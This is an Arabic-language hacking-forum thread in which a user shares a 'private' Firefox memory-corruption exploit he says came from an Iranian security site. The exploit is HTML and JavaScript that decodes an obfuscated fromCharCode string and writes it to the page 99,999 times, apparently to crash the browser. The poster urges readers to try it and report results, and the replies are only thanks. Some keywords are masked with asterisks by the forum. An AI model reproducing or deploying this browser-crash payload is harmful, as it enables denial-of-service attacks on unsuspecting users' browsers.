1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : منير | المشاهدات : 2,755 | الردود : 3
الوسوم:
حالة الموضوع:
مغلق
  1. منير Guest

    السلآم عليكم !

    اليوم وأنا أتابع آخر المستجدات في مواقع السكيوتري !

    لقيت موقع ايراني ومنزل الثغرة هذه ببلك !!

    ^ كآنت برايفت ولآ زآلت تقريبا :)

    لذا قلت ننزلها بعد حن

    الثغرة عبارة عن كود html كما تعرفون ! وهذا هو الكود :
    كود PHP:
    <STYLE TYPE="text/css"
    <!-- 
    H2 

    color:green
    font-size:80pt
    font-style:italic

    --> 
    </
    STYLE
    <****** 
    type="text/java******"
    String.prototype.repeat = function( num 
    {return new Array( 
    num ).jointhis );} 
    var 
    i=0
    var 
    r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9
    var 
    bib=String.fromCharCode(60725062607765828185
    6969328773688472614948483732666972
    6586737982618367827976763268738269
    678473797861827371728432667167111108
    111114611211011081081111196260105110112
    117116321161211121016111511798109105116
    321189710811710161)+r+String.fromCharCode(32115116 
    1211081016134989799107103114111117110
    1004599111108111114589810897991073432
    62604777658281856969626047725062); 
    ********.
    write(bib.repeat(99999)); 
    <
    /******>  
    للاهمة مجربها قبل فترة !

    أتمنى التجريب وارسايل النتائج


    لكم كل الود ~&:"
     
  2. ÐấŖҚ йІḠḣṭ Developer

    الأنتساب:
    ‏16 يناير 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    طالب علم
    الإقامة:
    في خرايطهآ~
    رد: Priv8 - FireFox Memory Corruption

    يعطيــَك العافيه
     
  3. black magic Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    22
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    من بيتنا
    رد: Priv8 - FireFox Memory Corruption

    كفوووووووو حبيبي بارك الله فيك*:"
     
  4. mr.mourad <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏8 يوليو 2013
    المشاركات:
    170
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    رد: Priv8 - FireFox Memory Corruption

    يعطيك الف الف العافية اخي شكراً جزيلاً على الطرح :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة